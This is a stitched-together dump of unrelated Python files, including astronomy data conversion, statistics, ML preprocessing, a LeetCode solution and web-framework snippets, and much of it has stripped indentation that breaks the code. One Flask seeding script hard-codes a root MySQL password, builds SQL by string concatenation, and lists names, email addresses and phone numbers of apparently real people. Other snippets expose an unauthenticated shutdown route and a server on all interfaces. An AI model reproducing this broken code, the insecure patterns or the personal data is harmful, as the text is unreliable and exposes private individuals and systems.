def fits_to_h5(file_input, file_ind):
f_name = file_input.split('/')[-1][:-8]
# It takes about 30 seconds for the extraction from the fits files, which is
# very CPU intensive. After that, it maxes out at 1 cpu/process.
t0 = timer()
# from table 3 of astro-ph/0302222
gain_guesses = np.array([ -0.974, +0.997,
+1.177, -1.122,
+0.849, -0.858,
-1.071, +0.985,
+1.015, -0.948,
+0.475, -0.518,
-0.958, +0.986,
-0.783, +0.760,
+0.449, -0.494,
-0.532, +0.532,
-0.450, +0.443,
+0.373, -0.346,
+0.311, -0.332,
+0.262, -0.239,
-0.288, +0.297,
+0.293, -0.293,
-0.260, +0.281,
-0.263, +0.258,
+0.226, -0.232,
+0.302, -0.286])
alpha = -1
fknee = 0.1
nside = 256
ntodsigma = 100
npsi = 2048
psiBins = np.linspace(0, 2*np.pi, npsi)
fsamp = 30/1.536 # A single TOD record contains 30 1.536 second major science frames
chunk_size = 1875
nsamp = chunk_size*fsamp
chunk_list = np.arange(25)
# WMAP data divides evenly into 25 chunks per day...
bands = ['K1', 'Ka1', 'Q1', 'Q2', 'V1', 'V2', 'W1', 'W2', 'W3', 'W4']
#bands = ['K1']
t2jd = 2.45e6
jd2mjd = 2400000.5
data = fits.open(file_input)
band_labels = data[2].columns.names[1:-6]
daflags = data[2].data['daflags']
TODs = []
for key in data[2].columns.names[1:-6]:
TODs.append(data[2].data[key])
# position (and velocity) in km(/s) in Sun-centered coordinates
pos = data[1].data['POSITION']
vel = data[1].data['VELOCITY']
time_aihk = data[1].data['TIME'] + t2jd - jd2mjd
time = data[2].data['TIME'] + t2jd - jd2mjd
dt0 = np.diff(time).mean()
gal_A, gal_B, pol_A, pol_B = quat_to_sky_coords(data[1].data['QUATERN'])
psi_A = get_psi(gal_A, pol_A, band_labels[::4])
psi_B = get_psi(gal_B, pol_B, band_labels[1::4])
args_A = [(nside, gal_A[i][:,0], gal_A[i][:,1]) for i in range(len(gal_A))]
args_B = [(nside, gal_B[i][:,0], gal_B[i][:,1]) for i in range(len(gal_B))]
pix_A = []
pix_B = []
for i in range(len(args_A)):
pix_A.append(ang2pix_multiprocessing(*args_A[i]))
pix_B.append(ang2pix_multiprocessing(*args_B[i]))
n_per_day = 25
obs_inds = np.arange(n_per_day) + n_per_day*file_ind
obsids = [str(obs_ind).zfill(6) for obs_ind in obs_inds]
for band in bands:
args = [(file_ind, i, obsids[i], obs_inds[i], daflags, TODs, gain_guesses,
band_labels, band, psi_A, psi_B, pix_A, pix_B, fknee,
alpha, n_per_day, ntodsigma, npsi, psiBins, nside,
fsamp, pos, vel, time) for i in range(len(obs_inds))]
for i in range(n_per_day):
write_file_parallel(*args[i])
data.close()
print(f'\t{f_name} took {int(timer()-t0)} seconds')
sleep(30)
return
def main():
'''
Make 1 hdf5 file for every 10 fits files
'''
files = glob(prefix + 'tod/*.fits')
files.sort()
files = np.array(files)
inds = np.arange(len(files))
nprocs = 128
os.environ['OMP_NUM_THREADS'] = '1'
pool = Pool(processes=nprocs)
x = [pool.apply_async(fits_to_h5, args=[f, i]) for i, f in zip(inds, files)]
for i, res in enumerate(x):
#res.get()
res.wait()
pool.close()
pool.join()
if __name__ == '__main__':
main()
|
class Data:
def __init__(self, p):
self.p = p
    def variance(self):
        var = 0
        mean = sum(self.p)/len(self.p)
        for i in self.p:
            var += (i - mean)**2
        print(var/(len(self.p)-1))
    def mean(self):
        print(sum(self.p)/len(self.p))
    def sd(self):
        var = 0
        mean = sum(self.p)/len(self.p)
        for i in self.p:
            var += (i - mean)**2
        print((var/(len(self.p)-1))**0.5)
def median(self):
self.p = sorted(self.p)
if(len(self.p)%2 == 0):
print((self.p[(len(self.p)-1)//2]+self.p[((len(self.p)-1)//2) + 1]) / 2)
else:
print(self.p[len(self.p)//2])
def quartile(self,percentile):
self.p = sorted(self.p)
self.percentile = percentile
self.index = (self.percentile/100) * (len(self.p)-1)
# self.remainder = self.index - round(self.index)
#print(self.remainder, self.index)
print("__________")
print(self.index)
print(self.p[round(self.index)])# + self.remainder*(self.p[round(self.index)+1]) - self.p[round(self.index)])
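# A possible refinement of quartile() that linearly interpolates between the two
# nearest ranks (the approach hinted at in the commented-out code above); this is
# an illustrative sketch, not part of the original class.
def quartile_interpolated(values, percentile):
    values = sorted(values)
    index = (percentile / 100) * (len(values) - 1)
    lower = int(index)
    frac = index - lower
    if lower + 1 < len(values):
        return values[lower] + frac * (values[lower + 1] - values[lower])
    return values[lower]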
if __name__ == "__main__":
# 1240 1200 1010 940 1100 1450 1750 2000 2100 1020 1500 2010 2750 3030 1400 750 1200 1100 1500 3510 4500 7000
p = list(map(int,input().split()))
q = [i-1500 for i in p]
Data_Object = Data(p)
Data_Object_2 = Data(q)
Data_Object.quartile(25)
Data_Object.quartile(50)
Data_Object.quartile(75)
Data_Object.quartile(99)
# Data_Object.median()
# Data_Object.mean()
# Data_Object.variance()
# Data_Object_1.sd()
# Data_Object_2.sd()
|
import numpy as np
from cloudmetrics.utils import make_periodic_mask
def _parse_example_mask(s):
return np.array([[float(c) for c in line] for line in s.strip().splitlines()])
EXAMPLE_MASK = _parse_example_mask(
"""
00011000
11000011
11011011
00011000
00000000
00000000
00011000
00011000
"""
)
EXAMPLE_MASK_DOUBLED = _parse_example_mask(
"""
0000000000000000
0000001111000000
0001101111000000
0001100000000000
0000000000000000
0000000000000000
0001100000000000
0001100000000000
0001100000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
0000000000000000
"""
)
def test_periodic_domain():
nx, ny = EXAMPLE_MASK.shape
mask_periodic = make_periodic_mask(EXAMPLE_MASK, object_connectivity=1)
assert mask_periodic.shape == (nx * 2, ny * 2)
np.testing.assert_equal(mask_periodic, EXAMPLE_MASK_DOUBLED)
|
"""
Brenna Carver & Cece Tsui
CS349 Final Project
Spring 2017
"""
from sklearn.feature_extraction.text import TfidfVectorizer
import json
import numpy as np
def getAverageRatings(filename, type):
''' Returns a dictionary consisting of user or business ids as keys and average rating
as values '''
ratingDict = {}
#According to type, refer to the corresponding keys
stars = "stars"
obj_id = "business_id"
if type=="user":
stars = "average_stars"
obj_id = "user_id"
    with open(filename, "r") as f:
        for line in f:
            obj = json.loads(line)
            #Associate the id of the business/user to their average rating
            ratingDict[obj[obj_id]] = obj[stars]
return ratingDict
def splitData(filename):
'''Takes in a filename where the file contains all data in the form of json. The function
splits all the data in the given file where 80% of the data is training data, 10% is development
and 10% is testing. Once split, the function writes the data into new files - "training.json",
"development.json", and "test.json" (Note we only looked at half of the data because
there was too much data and it was crashing out computers).'''
with open(filename) as f:
data = []
for obj in f:
data.append(json.loads(obj)) #Load each json object
    #Compute how many records make up 80% and 10% of half of the data
halfData = int(len(data)*.5)
eightper = int(halfData*.8)
tenper = int(halfData*.1)
#Split the data into train, development test
train = []
dev = []
test = []
counter = 0
for i in range(halfData):
if counter < eightper: #Take first 80% of the data for train
train.append(data[i])
elif counter < eightper+tenper: #Take the next 10% for development
dev.append(data[i])
else:
test.append(data[i]) #Take the final 10% for test
counter += 1
#Write the split data into their correlating files
with open("train.json", "w") as trainFile:
json.dump(train, trainFile)
with open("development.json", "w") as devFile:
json.dump(dev, devFile)
with open("test.json", "w") as testFile:
json.dump(test, testFile)
def getVocabulary(filename, mindf):
''' Returns a tuple consisting of the (1) list of text, (2) the text vector,
(3) the vote vector, (4) a tuple of the labels - one for logistic regression
and the other for linear regression.'''
reviewIndexDict = {} #{indexInMatrix: [useful, funny, cool]}
textList = []
labelList_log = []
labelList_lin = []
#counter = 0 #place of data in matrix
with open(filename) as f:
data = []
        for line in f:
            data.append(json.loads(line)) #Load each JSON object
votes = np.zeros((len(data),3))
#Look through each JSON obj
for i in range(len(data)):
obj = data[i]
textList.append(obj.get("text", "")) #Create text List
#reviewIndexDict[counter] = [obj["useful"], obj["funny"], obj["cool"]]
#counter += 1 #next data
#Add to the vote vector
votes[i][0] = obj["useful"]
votes[i][1] = obj["funny"]
votes[i][2] = obj["cool"]
#Label of the current text list; linear regression will label based on 1-5 num scale
labelList_lin.append(int(obj["stars"]))
            #Label for logistic regression - binarize
label = 0 #0 for stars 1-3; "bad" review
if int(obj["stars"]) > 3: #1 for stars 4-5; "good" review
label = 1
labelList_log.append(label) #labels
print("Finished text list")
#Vectorize the text list to show tfidf values
vectorizer = TfidfVectorizer(strip_accents="unicode", min_df = mindf, lowercase = True, use_idf = True)
    textX = vectorizer.fit_transform(textList)
print("Finished vectorizing")
return (textList, textX, votes, (labelList_log, labelList_lin))
def getVotes(reviewIndexDict):
votes = np.zeros((len(reviewIndexDict),3))
for i in range(len(reviewIndexDict)):
for j in range(3):
votes[i][j] = reviewIndexDict[i][j]
return votes
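# Minimal usage sketch (illustrative; the file name and min_df value are
# assumptions, and the input file is expected to contain one JSON review
# object per line):
# textList, textX, votes, (labels_log, labels_lin) = getVocabulary("reviews.json", mindf=5)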
|
MOD = int(1e9 + 7)
class Solution(object):
def findPaths(self, m, n, N, i, j):
dp = [{} for _ in range(N + 1)]
dp[0][(i, j)] = 1
dirs = [(0, 1), (0, -1), (1, 0), (-1, 0)]
ans = 0
for step in range(1, N + 1):
for r, c in dp[step - 1]:
                # count of paths that reached this state at the previous step
count = dp[step - 1][(r, c)]
for dr, dc in dirs:
nr, nc = dr + r, dc + c
                    # moved out of bounds
if nr >= m or nc >= n or nr < 0 or nc < 0:
ans += count
ans %= MOD
                    # other ways to reach this cell at this step
elif (nr, nc) in dp[step]:
dp[step][(nr, nc)] += count
                    # first time reaching this cell
else:
dp[step][(nr, nc)] = count
return ans % MOD
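# Quick illustrative check (the sample case of LeetCode 576 "Out of Boundary
# Paths"): starting at (0, 0) on a 2x2 grid with at most 2 moves, 6 paths
# leave the grid.
if __name__ == '__main__':
    print(Solution().findPaths(2, 2, 2, 0, 0))  # expected output: 6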
|
from gdstorage.storage import GoogleDriveStorage, GoogleDrivePermissionType, \
GoogleDrivePermissionRole, GoogleDriveFilePermission
from django.conf import settings
if settings.GDRIVE_USER_EMAIL:
permission = GoogleDriveFilePermission(
GoogleDrivePermissionRole.READER,
GoogleDrivePermissionType.USER,
settings.GDRIVE_USER_EMAIL
)
else:
permission = GoogleDriveFilePermission(
GoogleDrivePermissionRole.READER,
GoogleDrivePermissionType.ANYONE
)
gd_storage = GoogleDriveStorage(permissions=(permission, ))
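# A typical (illustrative) way to attach this storage backend to a model field;
# the model and field names below are assumptions, not part of this project:
# from django.db import models
# class Report(models.Model):
#     attachment = models.FileField(upload_to='reports', storage=gd_storage)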
|
from __future__ import division
import hercubit
# import saved_data
import pickle
import sklearn
from sklearn import datasets, svm
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pylab as pl
try:
import mpld3
from mpld3 import enable_notebook
from mpld3 import plugins
enable_notebook()
except Exception as e:
print "Attempt to import and enable mpld3 failed", e
# what would seaborn do?
try:
import seaborn as sns
except Exception as e:
print "Attempt to import and enable seaborn failed", e
# Attribution: https://gist.github.com/schlady/1576079
def peakdetect(y_axis, x_axis = None, lookahead = 500, delta = 0):
    """
    Converted from/based on a MATLAB script at http://billauer.co.il/peakdet.html
    Algorithm for detecting local maxima and minima in a signal.
    Discovers peaks by searching for values which are surrounded by lower
    or larger values for maxima and minima respectively
    keyword arguments:
    y_axis -- A list containing the signal over which to find peaks
    x_axis -- An x-axis whose values correspond to the 'y_axis' list and is used
        in the return to specify the position of the peaks. If omitted the index
        of the y_axis is used. (default: None)
    lookahead -- (optional) distance to look ahead from a peak candidate to
        determine if it is the actual peak (default: 500)
        '(sample / period) / f' where '4 >= f >= 1.25' might be a good value
    delta -- (optional) this specifies a minimum difference between a peak and
        the following points, before a peak may be considered a peak. Useful
        to hinder the algorithm from picking up false peaks towards the end of
        the signal. To work well delta should be set to 'delta >= RMSnoise * 5'.
        (default: 0)
        When omitted, the delta check costs about 20% in speed; used correctly
        it can double the speed of the algorithm.
    return -- two lists [maxtab, mintab] containing the positive and negative
        peaks respectively. Each cell of the lists contains a tuple of:
        (position, peak_value)
        to get the average peak value do 'np.mean(maxtab, 0)[1]' on the results
    """
    global np
maxtab = []
mintab = []
    dump = [] #Used to pop the first hit which is always false
length = len(y_axis)
if x_axis is None:
x_axis = range(length)
#perform some checks
if length != len(x_axis):
raise ValueError, "Input vectors y_axis and x_axis must have same length"
if lookahead < 1:
raise ValueError, "Lookahead must be above '1' in value"
if not (np.isscalar(delta) and delta >= 0):
raise ValueError, "delta must be a positive number"
#needs to be a numpy array
y_axis = np.asarray(y_axis)
#maxima and minima candidates are temporarily stored in
#mx and mn respectively
mn, mx = np.Inf, -np.Inf
#Only detect peak if there is 'lookahead' amount of points after it
for index, (x, y) in enumerate(zip(x_axis[:-lookahead], y_axis[:-lookahead])):
if y > mx:
mx = y
mxpos = x
if y < mn:
mn = y
mnpos = x
####look for max####
if y < mx-delta and mx != np.Inf:
#Maxima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].max() < mx:
maxtab.append((mxpos, mx))
dump.append(True)
#set algorithm to only find minima now
mx = np.Inf
mn = np.Inf
## Morgan's addition
y
####look for min####
if y > mn+delta and mn != -np.Inf:
#Minima peak candidate found
#look ahead in signal to ensure that this is a peak and not jitter
if y_axis[index:index+lookahead].min() > mn:
mintab.append((mnpos, mn))
dump.append(False)
#set algorithm to only find maxima now
mn = -np.Inf
mx = -np.Inf
#Remove the false hit on the first value of the y_axis
try:
if dump[0]:
maxtab.pop(0)
#print "pop max"
else:
mintab.pop(0)
#print "pop min"
del dump
except IndexError:
#no peaks were found, should the function return empty lists?
pass
return maxtab, mintab
def remap(peaks):
"""Reformat coordinates of peaks to properly feed into pyplot"""
tabs=[]
for tab in peaks: #mintab and maxtab
tab=([i[1] for i in tab],[i[0] for i in tab])
tabs.append(tab)
return tabs
def get_peaks(df_x,sensor='acc',mylookahead=10, delta=""):
peak_dict={}
ranges={}
times={}
if sensor=="acc": axes=list(df_x.columns[4:7])
if sensor=="gyro": axes=list(df_x.columns[7:10])
if sensor=="magnet": axes=list(df_x.columns[10:13])
for axis in axes:
peaks=peakdetect(df_x[axis],df_x['t (sec)'], lookahead=mylookahead,delta=delta)
peaks=remap(peaks)
print "%d local min, %d local max found on %s axis" % (len(peaks[1][0]),len(peaks[0][0]),axis)
times[axis] = [i[1] for i in peaks]
return times
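# A minimal, illustrative self-test of peakdetect on a synthetic signal (the
# lookahead/delta values below are assumptions chosen for this toy example):
if __name__ == '__main__':
    t_demo = np.linspace(0, 10, 5000)          # 10 periods, 500 samples each
    y_demo = np.sin(2 * np.pi * t_demo)        # noiseless sine wave
    maxtab_demo, mintab_demo = peakdetect(y_demo, t_demo, lookahead=50, delta=0.1)
    print "found %d maxima and %d minima" % (len(maxtab_demo), len(mintab_demo))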
|
# -*- coding: utf-8 -*-
# To change this template, choose Tools | Templates
# and open the template in the editor.
import memcache
def getCache():
return memcache.Client(['127.0.0.1:11211'],debug=0)
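# Minimal usage sketch (illustrative; assumes a memcached daemon is listening
# on 127.0.0.1:11211):
# cache = getCache()
# cache.set('greeting', 'hello', time=60)  # cache for 60 seconds
# value = cache.get('greeting')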
|
from arago.actors import Router
class ShortestQueueRouter(Router):
"""Routes received messages to the child with the lowest number of enqueued tasks"""
def _route(self, msg):
# Try to simply find a free worker, first
for item in self._children:
if hasattr(item, "_busy") and not item._busy:
return item
# If all workers are busy, order them by queue length and return the first
# FIXME: Can probably be optimized by not sorting the whole list
item = sorted(self._children, key=lambda item: len(item._mailbox), reverse=False)[0]
return item
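# Illustrative sketch of the optimization hinted at in the FIXME above: min()
# scans the children once (O(n)) instead of sorting the whole list (O(n log n)).
# Not part of the original class.
#
# def _route(self, msg):
#     for item in self._children:
#         if hasattr(item, "_busy") and not item._busy:
#             return item
#     return min(self._children, key=lambda item: len(item._mailbox))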
|
#!/usr/bin/env python2.7
# -*- coding: UTF-8 -*-
import SimpleHTTPServer
import SocketServer
IP = "0.0.0.0"
PORT = 8000
def main():
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((IP, PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()
if __name__ == "__main__":
main()
|
from flask import Flask
from be.view import auth, order, goods
from flask import Blueprint
from flask import request
import logging
bp_shutdown = Blueprint("shutdown", __name__)
def shutdown_server():
func = request.environ.get("werkzeug.server.shutdown")
if func is None:
raise RuntimeError("Not running with the Werkzeug Server")
func()
@bp_shutdown.route("/shutdown")
def be_shutdown():
shutdown_server()
return "Server shutting down..."
def be_run():
logging.basicConfig(filename="app.log", level=logging.ERROR)
app = Flask(__name__)
app.register_blueprint(bp_shutdown)
app.register_blueprint(auth.bp_auth)
app.register_blueprint(order.bp_order)
app.register_blueprint(goods.bp_goods)
app.run()
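# Illustrative way to trigger the shutdown endpoint from another process,
# assuming the default Flask host and port (both are assumptions here):
# import requests
# requests.get("http://127.0.0.1:5000/shutdown")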
|
from django.apps import AppConfig
class PdfwebsiteConfig(AppConfig):
name = 'pdfwebsite'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import pyqtSignal
class progressWidget(QtWidgets.QDialog):
progressClosed = pyqtSignal(int, name='progressClosed')
def __init__(self):
QtWidgets.QDialog.__init__(self)
#self.setAttribute()
self.initUI()
def initUI(self):
self.progress = QtWidgets.QProgressBar(self)
self.progress.setGeometry(0, 0, 250, 20)
self.progress.setValue(0)
self.directory = QtWidgets.QLabel('Directory', self)
#self.directory.move(0, 30)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(100)
sizePolicy.setVerticalStretch(0)
self.directory.setSizePolicy(sizePolicy)
self.directory.setGeometry(0, 30, 250, 20)
self.show()
def setValue(self,value):
self.progress.setValue(value)
self.setWindowTitle(str(value)+"%")
def setDirectoryText(self,value):
self.directory.setText(value)
def closeEvent(self,event):
print("progressClosed=OnClose")
self.progressClosed.emit(0)
self.close()
event.accept()
|
class Player(object):
def __init__(self, name, cup=None):
self.name = name
self.cup = cup
|
import math
class Point:
def reset(self):
self.x = 0
self.y = 0
def move(self,x=0,y=0):
self.x = x
self.y = y
def calc_distance(self,anotherpoint):
return math.sqrt((self.x -anotherpoint.x)**2 + (self.y - anotherpoint.y)**2)
p1 = Point()
p2 = Point()
p1.reset()
p2.move(3,4)
print(p1.calc_distance(p2))
|
# A program that indexes the supplied corpus of documents and then iteratively asks for
# search queries and provides results (as a list of file paths). If the search query contains
# more than one word, consider this to be a Boolean AND query.
from CONST import *
from Directory_Listing import ListFiles
from File_Reading import GetFileContents
from Tokenization import GenerateTokens
from Linguistic_Modules import LingModule, LingStr
from Sorting_Tokens import SortTokens
from Transformation_Postings import TransformationIntoPostings
from Postings_List_Merge import PostingListMerge
import time
import os
#from Get_Memory_Req import GetMemory
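# A minimal sketch of the sorted-postings intersection that a Boolean AND merge
# performs; the real work is done by PostingListMerge imported above, and this
# stand-alone helper is for illustration only.
def _intersect_two_sorted(postings_a, postings_b):
    i = j = 0
    common = []
    while i < len(postings_a) and j < len(postings_b):
        if postings_a[i] == postings_b[j]:
            common.append(postings_a[i])
            i += 1
            j += 1
        elif postings_a[i] < postings_b[j]:
            i += 1
        else:
            j += 1
    return common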
if __name__ == "__main__":
pid = os.getpid()
pyname = os.path.basename(__file__)
start = time.time()
# Directory Listing
all_files = ListFiles(rootDir)
all_token_pairs = []
for file in all_files:
# File Reading
file_text = GetFileContents(file)
# Tokenization
token_pairs = GenerateTokens(file_text, file)
# Linguistic Modules
modified_token_pairs = LingModule(token_pairs)
all_token_pairs += modified_token_pairs
del file_text
del token_pairs
del modified_token_pairs
# Sorting the Tokens
sorted_tokens = SortTokens(all_token_pairs)
del all_token_pairs
# Transformation into Postings
#m_s = GetMemory(pid,pyname)
posting_list = TransformationIntoPostings(sorted_tokens)
#m_e = GetMemory(pid,pyname)
time_index = (time.time() - start)*1000
del sorted_tokens
print("Time for creating index:\t", time_index, "ms")
##print("Memory for the index:\t", m_e - m_s, "KB")
while True:
query = input()
q_start = time.time()
queries = query.split()
queries = [LingStr(item) for item in queries]
try:
            if len(queries) < 2:
                length, fileList = posting_list[queries[0]]
                print(fileList)
else:
print(PostingListMerge([posting_list[item] for item in queries]))
except BaseException:
print([])
q_time = (time.time() - q_start)*1000
print("Time for this query:\t", q_time, "ms")
|
from flask import Flask, render_template
from flaskext.mysql import MySQL
from werkzeug.security import generate_password_hash, check_password_hash
app = Flask(__name__)
mysql = MySQL()
app.config['MYSQL_DATABASE_USER'] = 'root'
app.config['MYSQL_DATABASE_PASSWORD'] = 'seproject'
app.config['MYSQL_DATABASE_DB'] = 'IMS_DB1'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
conn = mysql.connect()
cursor = conn.cursor()
if __name__ == "__main__" :
password = "admin123"
hashed_password = generate_password_hash(password)
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sanjay \",\""+ str(hashed_password) +"\",\"sanjay.yoshimitsu@gmail.com\",\"7829373542\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Shruthi S \",\""+ str(hashed_password) +"\",\"shruthi.shankar2512@gmail.com\",\"9686511872\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sai Shashank \",\""+ str(hashed_password) +"\",\"sai.sasank.yadati@gmail.com\",\"8861219216\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"RM Sourabh\",\""+ str(hashed_password) +"\",\"sourabhraja97@gmail.com\",\"9880125575\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sandeep S\",\""+ str(hashed_password) +"\",\"sandeepsandy.pes@gmail.com\",\"9886943287\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sanat B\",\""+ str(hashed_password) +"\",\"sanathbhimsen26@gmail.com\",\"9740091229\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Raghavendra H\",\""+ str(hashed_password) +"\",\"raghavendrahegde17@gmail.com\",\"9481159571\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Rekha R\",\""+ str(hashed_password) +"\",\"rekharenu2715@gmail.com\",\"9036360647\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sameer S\",\""+ str(hashed_password) +"\",\"sam13kv@gmail.com\",\"9886943287\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sanjuktha G\",\""+ str(hashed_password) +"\",\"sanjukthaps@gmail.com\",\"9964054600\", \"PESU\");")
conn.commit()
cursor.execute("insert into Customer (customer_id, user_name,hashed_password, email_id, phone_no,company_name) values(NULL,\"Sai Bhavana\",\""+ str(hashed_password) +"\",\"sai.bhavana.ambati@gmail.com\",\"9890243965\", \"PESU\");")
conn.commit()
|
# usage:
# results = analyze_result(filename='bag_free_17.txt')
#
# internally builds a dictionary of results, then returns it flattened into a
# list matching get_headers():
# results = {
# 'pre': { # in the pre-app
# 't0': 0, # time from start of app to first child action
# 'total_duration': 0, # total duration of audio played
# 'multi_entropy': 0 # entropy of character selection
# },
# 'post': { # in the post-app
# 't0': 0,
# 'total_duration': 0,
# 'multi_entropy': 0
# }
# }
import ast
from datetime import datetime
import numpy as np
import os
def get_headers():
return ['subject_id', 'pre_t0', 'pre_total_duration', 'pre_multi_entropy', 'post_t0', 'post_total_duration', 'post_multi_entropy']
def analyze_result(filename, pathname='./processed_data/txt/'):
data = {'pre': {}, 'post': {}}
with open(os.path.join(pathname,filename), 'r') as fp:
for line in fp:
dic = ast.literal_eval(line[6:])
if len(dic['comment'])>0:
if dic['obj'] == 'start_button_pre':
current_game = 'pre'
data['pre']['start'] = datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
if dic['obj'] == 'start_button_post':
current_game = 'post'
data['post']['start'] = datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
if dic['action'] == 'play':
try:
data[current_game]['sequence'].append(dic['obj'])
except:
data[current_game]['sequence'] = [dic['obj']]
try:
data[current_game][dic['comment']]['start'] =\
datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
except:
data[current_game][dic['comment']] = {
'start': datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')}
elif dic['action'] == 'stop':
try:
data[current_game][dic['comment']]['stop'] =\
datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')
except:
data[current_game][dic['comment']] = {
'stop': datetime.strptime(dic['time'], '%Y_%m_%d_%H_%M_%S_%f')}
for p in data['pre'].values():
try:
p['duration'] = p['stop'] - p['start']
except:
pass
for p in data['post'].values():
try:
p['duration'] = p['stop'] - p['start']
except:
pass
# calculating results:
results = {
'pre': { # in the pre-app
't0': 0, # time from start of app to first child action
'total_duration': 0, # total duration of audio played
'multi_entropy': 0 # entropy of character selection
},
'post': { # in the post-app
't0': 0,
'total_duration': 0,
'multi_entropy': 0
}
}
# calculate t0: time from start to first character movement
pre_first_t0 = None
post_first_t0 = None
for p in data['pre'].values():
try:
if pre_first_t0 is None:
pre_first_t0 = p['start']
else:
pre_first_t0 = min([pre_first_t0, p['start']])
except:
pass
for p in data['post'].values():
try:
if post_first_t0 is None:
post_first_t0 = p['start']
else:
post_first_t0 = min([post_first_t0, p['start']])
except:
pass
try:
results['pre']['t0'] = (pre_first_t0 - data['pre']['start']).total_seconds()
results['post']['t0'] = (post_first_t0 - data['post']['start']).total_seconds()
except:
pass
# calculate total_duration: total time that had playing sound
for p in data['pre'].values():
try:
results['pre']['total_duration'] += p['duration'].total_seconds()
except:
pass
for p in data['post'].values():
try:
results['post']['total_duration'] += p['duration'].total_seconds()
except:
pass
# calculate multi_entropy: the entropy of the different characters
try:
results['pre']['multi_entropy'] = sequence_entropy(data['pre']['sequence'])
results['post']['multi_entropy'] = sequence_entropy(data['post']['sequence'])
except:
pass
#print(results)
#convert dictionary to list:
result_list = []
subject_id = filename.replace('bag_free_test','')
subject_id = subject_id.replace('.txt','')
result_list.append(subject_id)
result_list.append(results['pre']['t0'])
result_list.append(results['pre']['total_duration'])
result_list.append(results['pre']['multi_entropy'])
result_list.append(results['post']['t0'])
result_list.append(results['post']['total_duration'])
result_list.append(results['post']['multi_entropy'])
return result_list
def sequence_entropy(sequence):
characters = list(set(sequence))
num_characters = len(characters)
sequence_length = len(sequence)
prob = np.zeros([num_characters])
for c in sequence:
prob[characters.index(c)] += 1.0 / float(sequence_length)
entropy = 0.0
for p in prob:
entropy -= p * np.log2(p)
return entropy
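# For example, sequence_entropy(['dog', 'dog', 'cat', 'bird']) uses the
# probabilities (0.5, 0.25, 0.25) and returns
# -(0.5*log2(0.5) + 0.25*log2(0.25) + 0.25*log2(0.25)) = 1.5 bits.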
results = analyze_result('bag_free_p044.txt','./results/txt/')
print(results)
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from pants.backend.shell.lint.shfmt.skip_field import SkipShfmtField
from pants.backend.shell.lint.shfmt.subsystem import Shfmt
from pants.backend.shell.target_types import ShellSourceField
from pants.core.goals.fmt import FmtResult, FmtTargetsRequest
from pants.core.util_rules.config_files import ConfigFiles, ConfigFilesRequest
from pants.core.util_rules.external_tool import DownloadedExternalTool, ExternalToolRequest
from pants.core.util_rules.partitions import PartitionerType
from pants.engine.fs import Digest, MergeDigests
from pants.engine.platform import Platform
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import FieldSet, Target
from pants.util.logging import LogLevel
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class ShfmtFieldSet(FieldSet):
required_fields = (ShellSourceField,)
sources: ShellSourceField
@classmethod
def opt_out(cls, tgt: Target) -> bool:
return tgt.get(SkipShfmtField).value
class ShfmtRequest(FmtTargetsRequest):
field_set_type = ShfmtFieldSet
tool_subsystem = Shfmt
partitioner_type = PartitionerType.DEFAULT_SINGLE_PARTITION
@rule(desc="Format with shfmt", level=LogLevel.DEBUG)
async def shfmt_fmt(request: ShfmtRequest.Batch, shfmt: Shfmt, platform: Platform) -> FmtResult:
download_shfmt_get = Get(
DownloadedExternalTool, ExternalToolRequest, shfmt.get_request(platform)
)
config_files_get = Get(
ConfigFiles, ConfigFilesRequest, shfmt.config_request(request.snapshot.dirs)
)
downloaded_shfmt, config_files = await MultiGet(download_shfmt_get, config_files_get)
input_digest = await Get(
Digest,
MergeDigests(
(request.snapshot.digest, downloaded_shfmt.digest, config_files.snapshot.digest)
),
)
argv = [
downloaded_shfmt.exe,
"-l",
"-w",
*shfmt.args,
*request.files,
]
result = await Get(
ProcessResult,
Process(
argv=argv,
input_digest=input_digest,
output_files=request.files,
description=f"Run shfmt on {pluralize(len(request.files), 'file')}.",
level=LogLevel.DEBUG,
),
)
return await FmtResult.create(request, result)
def rules():
return [
*collect_rules(),
*ShfmtRequest.rules(),
]
|
from django.db import models
class Article(models.Model):
title = models.CharField(max_length=100)
author = models.CharField(max_length=100)
